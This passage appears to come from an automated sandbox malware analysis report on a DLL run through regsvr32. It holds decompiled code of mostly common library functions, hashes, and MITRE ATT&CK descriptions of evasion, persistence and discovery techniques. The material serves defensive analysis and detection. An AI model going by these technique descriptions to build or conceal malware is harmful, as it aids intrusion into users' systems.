				_v80 =  *_t232 & 0x0000ffff;
				_t107 = E00007FFA7FFA09501E40( *_t232 & 0xffff);
				_t128 = _v80 & 0x0000ffff;
				if (_t107 != _t128) goto 0x9501449;
				_t146 = _v108 + 2;
				_v108 = _t146;
				if (_t128 != 0xa) goto 0x950143a;
				if (E00007FFA7FFA09501E40(0xd) != 0xd) goto 0x9501449;
				_t147 = _t146 + 1;
				_v108 = _t147;
				if ( &(_t232[1]) - _t228 >= 0) goto 0x9501514;
				goto 0x95013fa;
				_v112 = GetLastError();
				goto 0x9501514;
				r9d = r15d;
				_v136 = __r9;
				E00007FFA7FFA09500958(0xd, r12d, _t147, __ebp, __esp, __r9,  &_v112, _t230);
				asm("movsd xmm0, [eax]");
				goto 0x9501519;
				if ( *((intOrPtr*)( *((intOrPtr*)(0x956f940 + _v120 * 8)) + 0x38 + _t229 * 8)) - dil >= 0) goto 0x95014e1;
				_t169 = sil;
				if (_t169 == 0) goto 0x95014cd;
				if (_t169 == 0) goto 0x95014b9;
				if (_t147 - 1 != 1) goto 0x9501529;
				r9d = r15d;
				E00007FFA7FFA09500EE8(_t122, r12d, _t182, _t186,  &_v112, _t212, _t230);
				goto 0x950146e;
				r9d = r15d;
				E00007FFA7FFA09501004(r12d,  *((intOrPtr*)(_t182 + 8)), _t182, _t186,  &_v112, _t212, _t230);
				goto 0x950146e;
				r9d = r15d;
				E00007FFA7FFA09500DE4(_t122, r12d, _t182, _t186,  &_v112, _t212, _t230);
				goto 0x950146e;
				r8d = r15d;
				_v136 = _v136 & _t182;
				_v112 = _t182;
				_v104 = 0;
				if (WriteFile(??, ??, ??, ??, ??) != 0) goto 0x9501511;
				_t116 = GetLastError();
				_v112 = _t116;
				asm("movsd xmm0, [ebp-0x30]");
				asm("movsd [ebp-0x20], xmm0");
				if (_t116 != 0) goto 0x9501592;
				_t117 = _v96;
				if (_t117 == 0) goto 0x9501568;
				if (_t117 != 5) goto 0x9501558;
				 *((char*)(_t186 + 0x30)) = 1;
				 *((intOrPtr*)(_t186 + 0x2c)) = 9;
				 *((char*)(_t186 + 0x38)) = 1;
				 *(_t186 + 0x34) = _t117;
				goto 0x95012fb;
				_t208 = _t186;
				E00007FFA7FFA094FB3DC(_v96, _t208);
				goto 0x95012fb;
				if (( *( *((intOrPtr*)(0x956f940 + _t208 * 8)) + 0x38 + _t229 * 8) & 0x00000040) == 0) goto 0x950157a;
				if ( *_t230 == 0x1a) goto 0x9501599;
				 *(_t186 + 0x34) =  *(_t186 + 0x34) & 0x00000000;
				 *((char*)(_t186 + 0x30)) = 1;
				 *((intOrPtr*)(_t186 + 0x2c)) = 0x1c;
				 *((char*)(_t186 + 0x38)) = 1;
				goto 0x95012fb;
				goto 0x950159b;
				return 0;
			}

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFA0950123C), ref: 00007FFA095013BF
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFA0950123C), ref: 00007FFA09501449

Memory Dump Source

Source File: 00000003.00000002.324572118.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000003.00000002.324493360.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324739630.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324845757.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324853680.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324861129.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324869383.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa094f0000_regsvr32.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: da2f82535048981fdee2fbb5626fefef0911d61da315dbd697428ec573955214
Instruction ID: d85695e6f89ed2e26629d20424b32f897206bd6d9c602b812b31faf89fa47bd3
Opcode Fuzzy Hash: da2f82535048981fdee2fbb5626fefef0911d61da315dbd697428ec573955214
Instruction Fuzzy Hash: 5D91E262E1CA5285FB50CF76A4802BD27A8BB8E788F448136DE0E57794CF38F449C712

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094F1CE0 Relevance: 6.1, APIs: 4, Instructions: 63
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 47%

			E00007FFA7FFA094F1CE0(void* __rax, long long __rcx, long long __rdx, long long __r8, long long _a8, long long _a16, long long _a24) {
				long long _v16;
				long long _v24;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr _t62;

				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				if ((E00007FFA7FFA094F2250(__rax, _a8, _a16) & 0x000000ff) == 0) goto 0x94f1d3a;
				E00007FFA7FFA094F18F0(__rax, _a8);
				_t48 = _a16 - __rax;
				E00007FFA7FFA094F1DF0(_t48, _a8, _a8, _t48, _a24);
				goto 0x94f1de7;
				E00007FFA7FFA094F2170(_t48, _a8);
				_t62 =  *0x956a228; // 0xffffffffffffffff
				_t50 = _t62 -  *_t48;
				if (_t50 - _a24 > 0) goto 0x94f1d65;
				E00007FFA7FFA094F2230(_a8);
				E00007FFA7FFA094F2170(_t50, _a8);
				_t52 =  *_t50 + _a24;
				_v24 = _t52;
				if (_a24 <= 0) goto 0x94f1de2;
				r8d = 0;
				if ((E00007FFA7FFA094F22B0(_t52, _a8, _v24) & 0x000000ff) == 0) goto 0x94f1de2;
				E00007FFA7FFA094F18F0(_t52, _a8);
				_v16 = _t52;
				E00007FFA7FFA094F2170(_t52, _a8);
				E00007FFA7FFA094F11E0(_v16 +  *_t52, _a16, _a24);
				return E00007FFA7FFA094F23A0(_v16 +  *_t52, _a8, _v24);
			}

APIs

Part of subcall function 00007FFA094F2250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F226B
Part of subcall function 00007FFA094F2250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F227C

Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F1D0E

Part of subcall function 00007FFA094F18F0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA094F18FE

Part of subcall function 00007FFA094F1DF0: _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFA094F1E56
Part of subcall function 00007FFA094F1DF0: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F1E98
Part of subcall function 00007FFA094F1DF0: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F1EAC
Part of subcall function 00007FFA094F1DF0: char_traits.LIBCPMTD ref: 00007FFA094F1EDB

_Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFA094F1D60
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F1DA2
char_traits.LIBCPMTD ref: 00007FFA094F1DCE

Memory Dump Source

Source File: 00000003.00000002.324572118.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000003.00000002.324493360.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324739630.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324845757.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324853680.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324861129.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324869383.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa094f0000_regsvr32.jbxd

Similarity

API ID: Concurrency::details::Work$Base::ContextIdentityQueue$Mtx_guardMtx_guard::~_char_traits$EmptyQueue::Structured
String ID:
API String ID: 3922470843-0
Opcode ID: 9dc5e077f87c3be6b44e717f9175d65acc51dec95d13604ab53f14413601f7af
Instruction ID: e423deb48b254f37fee4d296ca4fd8178b02f22e9b5d16f1d3442b611f954d51
Opcode Fuzzy Hash: 9dc5e077f87c3be6b44e717f9175d65acc51dec95d13604ab53f14413601f7af
Instruction Fuzzy Hash: 2721A16661CA8681DA50DF66F4A116FA370FBCEBC4F504036EB8D87B69CE6ED510CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094F1DF0 Relevance: 6.1, APIs: 4, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 50%

			E00007FFA7FFA094F1DF0(intOrPtr* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32) {
				long long _v24;
				long long _v32;
				long long _v40;
				void* _t44;
				intOrPtr* _t49;
				intOrPtr* _t51;
				long long _t53;
				intOrPtr* _t54;
				intOrPtr _t61;

				_t49 = __rax;
				_a32 = __r9;
				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				E00007FFA7FFA094F21F0(_t44, __rax, _a16, _a24);
				E00007FFA7FFA094F2400(_t44, __rax, _a16, _a24, _a32);
				_a32 = _t49;
				E00007FFA7FFA094F2170(_t49, _a8);
				_t61 =  *0x956a228; // 0xffffffffffffffff
				_t51 = _t61 -  *_t49;
				if (_t51 - _a32 > 0) goto 0x94f1e5b;
				E00007FFA7FFA094F2230(_a8);
				E00007FFA7FFA094F2170(_t51, _a8);
				_t53 =  *_t51 + _a32;
				_v40 = _t53;
				if (_a32 <= 0) goto 0x94f1eef;
				r8d = 0;
				if ((E00007FFA7FFA094F22B0(_t53, _a8, _v40) & 0x000000ff) == 0) goto 0x94f1eef;
				E00007FFA7FFA094F18D0(_t53, _a16);
				_t54 = _t53 + _a24;
				_v24 = _t54;
				E00007FFA7FFA094F18F0(_t54, _a8);
				_v32 = _t54;
				E00007FFA7FFA094F2170(_t54, _a8);
				E00007FFA7FFA094F11E0(_v32 +  *_t54, _v24, _a32);
				return E00007FFA7FFA094F23A0(_v32 +  *_t54, _a8, _v40);
			}

APIs

Part of subcall function 00007FFA094F21F0: _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFA094F2217

Part of subcall function 00007FFA094F2170: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA094F217E

_Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFA094F1E56
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F1E98
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F1EAC
char_traits.LIBCPMTD ref: 00007FFA094F1EDB

Memory Dump Source

Source File: 00000003.00000002.324572118.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000003.00000002.324493360.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324739630.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324845757.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324853680.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324861129.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324869383.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa094f0000_regsvr32.jbxd

Similarity

API ID: Concurrency::details::Work$Base::ContextIdentityMtx_guardMtx_guard::~_Queue$EmptyQueue::Structuredchar_traits
String ID:
API String ID: 3679362534-0
Opcode ID: be7b329d797fb93d546e8614ca837f2ae52d3ad5271fd09d0c871be752f4c66c
Instruction ID: 3926931172fa90843f122f7b667477c80203b18ce976ee01d89d33ed17b82d72
Opcode Fuzzy Hash: be7b329d797fb93d546e8614ca837f2ae52d3ad5271fd09d0c871be752f4c66c
Instruction Fuzzy Hash: D521AD7661CB4681DA10DF66F4A116EA760FBC9BD0F004035EA8D87B69CEBDD560CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA09501004 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
fileCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E00007FFA7FFA09501004(signed int __edx, void* __edi, void* __rax, signed long long __rbx, intOrPtr* __rcx, long long __rbp, signed short* __r8, signed long long _a8, signed long long _a16, long long _a24, char _a40, char _a1744, char _a1752, signed int _a5176, void* _a5192) {
				intOrPtr _v0;
				signed long long _v8;
				void* __rdi;
				void* __rsi;
				signed int _t41;
				signed long long _t62;
				short* _t67;
				signed int* _t68;
				intOrPtr* _t74;
				intOrPtr* _t76;
				void* _t84;
				void* _t88;
				signed short* _t89;
				void* _t91;
				void* _t94;
				signed short* _t97;
				void* _t99;
				void* _t101;
				void* _t103;
				void* _t106;
				void* _t107;

				_t97 = __r8;
				_t76 = __rcx;
				_a8 = __rbx;
				_a24 = __rbp;
				E00007FFA7FFA09502DE0(__edx, __rax, __rbx, __rcx, _t84, _t88, _t91, __r8, _t99, _t101, _t103);
				_t62 =  *0x956e008; // 0x36754d591002
				_a5176 = _t62 ^ _t94 - __rax;
				_t74 = _t76;
				r14d = r9d;
				r10d = r10d & 0x0000003f;
				_t107 = _t106 + _t97;
				_t89 = _t97;
				 *_t74 =  *((intOrPtr*)(0x956f940 + (__edx >> 6) * 8));
				 *((intOrPtr*)(_t74 + 8)) = 0;
				if (_t97 - _t107 >= 0) goto 0x9501145;
				_t67 =  &_a40;
				if (_t89 - _t107 >= 0) goto 0x95010ae;
				_t41 =  *_t89 & 0x0000ffff;
				if (_t41 != 0xa) goto 0x950109a;
				 *_t67 = 0xd;
				_t68 = _t67 + 2;
				 *_t68 = _t41;
				if ( &(_t68[0]) -  &_a1744 < 0) goto 0x950107c;
				_a16 = _a16 & 0x00000000;
				_a8 = _a8 & 0x00000000;
				_v0 = 0xd55;
				_v8 =  &_a1752;
				r9d = 0;
				E00007FFA7FFA094FD698();
				if (0 == 0) goto 0x950113d;
				if (0 == 0) goto 0x950112d;
				_v8 = _v8 & 0x00000000;
				r8d = 0;
				r8d = r8d;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x950113d;
				if (0 + _a24 < 0) goto 0x95010fa;
				 *((intOrPtr*)(_t74 + 4)) = __edi - r15d;
				goto 0x9501071;
				 *_t74 = GetLastError();
				return E00007FFA7FFA094F3A70(_t39, 0, 0, _a5176 ^ _t94 - __rax);
			}

APIs

WriteFile.KERNEL32 ref: 00007FFA0950111B
GetLastError.KERNEL32 ref: 00007FFA0950113D

Strings

U, xrefs: 00007FFA095010C7

Memory Dump Source

Source File: 00000003.00000002.324572118.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000003.00000002.324493360.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324739630.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324845757.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324853680.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324861129.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324869383.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa094f0000_regsvr32.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: f98079f3c4aa1eb608d226a3e204fe1cd29820aa8a2509467dcded0e9b762ee9
Instruction ID: 5153c8edd455aee5859786b78f8ba8310569f66d50dfc81c5c82143d04120d08
Opcode Fuzzy Hash: f98079f3c4aa1eb608d226a3e204fe1cd29820aa8a2509467dcded0e9b762ee9
Instruction Fuzzy Hash: CB41B322B1DA8182EB208F76F4543B967A4FB99794F808131EE4D87798DF3CE455C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA09502EB4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FFA7FFA09502EB4(intOrPtr* __rcx) {
				void* __rbx;
				void* _t3;
				void* _t7;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t13;

				_t3 = E00007FFA7FFA094F6B4C(_t7, __rcx, __rcx, _t10, _t11, _t12, _t13);
				if (( *(__rcx + 4) & 0x00000066) != 0) goto 0x9502ed5;
				if ( *__rcx != 0xe06d7363) goto 0x9502ed5;
				if (_t3 == 1) goto 0x9502edb;
				return _t3;
			}

0x7ffa09502ebd
0x7ffa09502ec6
0x7ffa09502ece
0x7ffa09502ed3
0x7ffa09502eda

APIs

__C_specific_handler.LIBVCRUNTIME ref: 00007FFA09502EBD

Part of subcall function 00007FFA094F6B4C: _IsNonwritableInCurrentImage.LIBCMT ref: 00007FFA094F6C0C
Part of subcall function 00007FFA094F6B4C: RtlUnwindEx.KERNEL32 ref: 00007FFA094F6C5B

Strings

f, xrefs: 00007FFA09502EC2
csm, xrefs: 00007FFA09502EC8

Memory Dump Source

Source File: 00000003.00000002.324572118.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000003.00000002.324493360.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324739630.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324845757.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324853680.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324861129.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324869383.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa094f0000_regsvr32.jbxd

Similarity

API ID: C_specific_handlerCurrentImageNonwritableUnwind
String ID: csm$f
API String ID: 1396615161-629598281
Opcode ID: 8a5be923c7cc1b99aa4a0096ba3a69dd8979e15323e2be363a2fe093e1ce8b04
Instruction ID: 2442d22e2dc104557a4ac847a126d6f798102c7ff4d2f722a4d191818359b54f
Opcode Fuzzy Hash: 8a5be923c7cc1b99aa4a0096ba3a69dd8979e15323e2be363a2fe093e1ce8b04
Instruction Fuzzy Hash: C8D05E51C4854745FB392F72204927909984F5E724E09C430CA3C043867E1EA8E48601

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA09503ED0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

LoadCursorW.USER32 ref: 00007FFA09503F22
RegisterClassExW.USER32 ref: 00007FFA09503F59

Strings

P, xrefs: 00007FFA09503ED9

Memory Dump Source

Source File: 00000003.00000002.324572118.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000003.00000002.324493360.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324739630.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324845757.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324853680.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324861129.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324869383.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa094f0000_regsvr32.jbxd

Similarity

API ID: ClassCursorLoadRegister
String ID: P
API String ID: 1693014935-3110715001
Opcode ID: 29bdbaf3f29e2b1f60e2da6c671781d039cfe66c367808efb662ff8ab2e4e8d5
Instruction ID: e6f53ed7ec4cfd4a754ed9f48c644afc4bf8f5f7c969de6a4708daf0888cbc38
Opcode Fuzzy Hash: 29bdbaf3f29e2b1f60e2da6c671781d039cfe66c367808efb662ff8ab2e4e8d5
Instruction Fuzzy Hash: 2301C432519B8086E7608F11F89831BB7B8F789748F604128E6CD82BA8DF7DE158CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094F472C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 37%

			E00007FFA7FFA094F472C(void* __eflags, void* __rax) {
				char _v40;
				void* _t6;
				void* _t11;
				void* _t12;
				char* _t14;
				void* _t16;

				E00007FFA7FFA094F45C0(__rax,  &_v40);
				_t14 =  &_v40;
				_t6 = E00007FFA7FFA094F6E00(_t12, _t14, 0x956cbd8, _t16);
				asm("int3");
				_t11 =  !=  ?  *((void*)(_t14 + 8)) : "Unknown exception";
				return _t6;
			}

0x7ffa094f4735
0x7ffa094f4741
0x7ffa094f4746
0x7ffa094f474b
0x7ffa094f4758
0x7ffa094f475d

APIs

std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFA094F4735
_CxxThrowException.LIBVCRUNTIME ref: 00007FFA094F4746

Part of subcall function 00007FFA094F6E00: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FFA094F472B), ref: 00007FFA094F6E7D
Part of subcall function 00007FFA094F6E00: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FFA094F472B), ref: 00007FFA094F6EBC

Strings

Unknown exception, xrefs: 00007FFA094F4751

Memory Dump Source

Source File: 00000003.00000002.324572118.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000003.00000002.324493360.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324739630.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324845757.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324853680.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324861129.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324869383.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa094f0000_regsvr32.jbxd

Similarity

API ID: Exception$FileHeaderRaiseThrowstd::bad_alloc::bad_alloc
String ID: Unknown exception
API String ID: 3561508498-410509341
Opcode ID: 245809459ad59a2729b59716ed244728fe2af4985c2eaed7b011566377c0e5b0
Instruction ID: d990231d9bff1cefac79d2bcd098a8f7f15f077d480304a0e99e83f8844601ea
Opcode Fuzzy Hash: 245809459ad59a2729b59716ed244728fe2af4985c2eaed7b011566377c0e5b0
Instruction Fuzzy Hash: A0D01722A1898691DE10EF20E8943A96334FB99308F909432D28C426B5DF2DE64EC340

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
